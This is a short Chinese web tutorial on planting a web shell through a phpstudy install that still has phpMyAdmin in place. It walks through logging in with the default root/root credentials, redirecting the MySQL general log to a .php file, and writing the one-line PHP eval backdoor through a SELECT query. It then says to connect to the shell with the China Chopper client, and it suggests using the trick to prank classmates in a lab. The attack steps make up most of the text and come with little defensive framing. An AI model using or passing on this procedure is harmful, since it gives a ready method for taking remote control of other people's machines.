您好,登錄后才能下訂單哦!
本篇內(nèi)容主要講解“phpstudy不刪除phpMyAdmin有什么影響”,感興趣的朋友不妨來(lái)看看。本文介紹的方法操作簡(jiǎn)單快捷,實(shí)用性強(qiáng)。下面就讓小編來(lái)帶大家學(xué)習(xí)“phpstudy不刪除phpMyAdmin有什么影響”吧!
發(fā)現(xiàn)一個(gè)phpstudy比較好玩的漏洞,在機(jī)房可以捉弄一下小伙伴
Win7虛擬機(jī):192.168.195.132
與目標(biāo)主機(jī)出在同一內(nèi)網(wǎng)
使用phpstudy且沒有刪除phpMyAdmin文件
phpstudy裝完之后會(huì)在根目錄創(chuàng)建一個(gè)phpMyAdmin
文件
物理機(jī)訪問一下phpMyAdmin
文件
用默認(rèn)賬號(hào)密碼root
-root
登進(jìn)去
在變量
欄處找到general log
,將它改成ON
將general log file
的地址改成E:\WWW\shell.php
去SQL
欄輸入查詢語(yǔ)句插入一句話木馬
select '<?php eval($_REQUEST[x]);?>'
成功之后就可以打開菜刀連接了
到此,相信大家對(duì)“phpstudy不刪除phpMyAdmin有什么影響”有了更深的了解,不妨來(lái)實(shí)際操作一番吧!這里是億速云網(wǎng)站,更多相關(guān)內(nèi)容可以進(jìn)入相關(guān)頻道進(jìn)行查詢,關(guān)注我們,繼續(xù)學(xué)習(xí)!
免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。